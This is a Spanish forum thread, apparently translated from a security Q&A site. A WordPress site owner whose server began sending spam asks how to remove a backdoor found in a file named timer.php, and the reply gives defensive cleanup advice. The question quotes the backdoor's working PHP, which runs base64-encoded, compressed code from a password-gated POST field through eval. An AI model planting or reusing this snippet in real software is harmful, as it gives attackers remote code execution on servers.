PHP Backdoor en el servidor en vivo [duplicado]

Navega tus respuestas
0

De repente, uno de nuestros sitios web de Wordpress comenzó a enviar correos electrónicos no deseados y se incluyó en la lista negra de MXToolBox. Así que con el soporte del servidor, exploré los archivos y encontré un archivo extraño llamado timer.php que contiene el siguiente bloque de código: 

 if (isset($_REQUEST["q"]) AND $_REQUEST["q"]=="1")
     {echo "200"; exit;}
 if(isset($_POST["key"]) && isset($_POST["chk"]) && $_POST["key"]=="some code")
     eval(gzuncompress(base64_decode($_POST["chk"])));

Después de algunas investigaciones en línea, descubrí que esto es malicioso y una puerta trasera. ¿Cuáles son las acciones recomendadas que debo tomar para mitigar esto? ¿Sería suficiente eliminar el archivo?

    
pregunta mapmalith 02.01.2018 - 06:43
fuente

1 respuesta

1

En resumen No.

Para el comentario de @ Alexander O'Mara, debe encontrar el acceso.

Los complementos de Wordpress son conocidos por agregar vulnerabilidades, un buen comienzo sería auditar sus complementos:

  1. Obtenga una lista de lo que hay
  2. Confirmar que todos los elementos deben estar allí.
  3. Averigüe por qué son necesarios
  4. Asegúrese de que los necesarios estén actualizados
  5. Verifique las vulnerabilidades conocidas en las últimas versiones de esas
  6. Reconsidere el requisito o busque reemplazos si los hay.

También deberá buscar otro acceso potencial (wordpress es un buen candidato, pero no el único) y las puertas traseras que pueden haber dejado (es decir, formas de recuperar el acceso, como un nuevo usuario o una shell inversa)

Si tiene una copia de seguridad, sería mejor actualizar ese & reconstruir desde el servidor básico. Es decir. eliminar la versión actual en vivo & comience desde la copia de seguridad o una compilación limpia.

Hay servicios que filtrarán su correo saliente. Usamos "Symantec Email Security.cloudmessage". Esto le puede alertar si comienza a enviar correos dudosos y parece funcionar para nosotros. Estoy seguro de que hay docenas de servicios similares.

Dependiendo del tiempo presupuestado, etc., puede considerar que alguien haga esto por usted. Tenga cuidado, hay muchas personas que pueden usar Wordpress pero no tienen idea de seguridad.

    
respondido por el Nate 02.01.2018 - 12:58
fuente

Lea otras preguntas en las etiquetas

¿Cómo puedo deshabilitar el registro para una regla específica en pfsense Búsquedas impares devueltas al final de la URL de la página de inicio; posible explotar?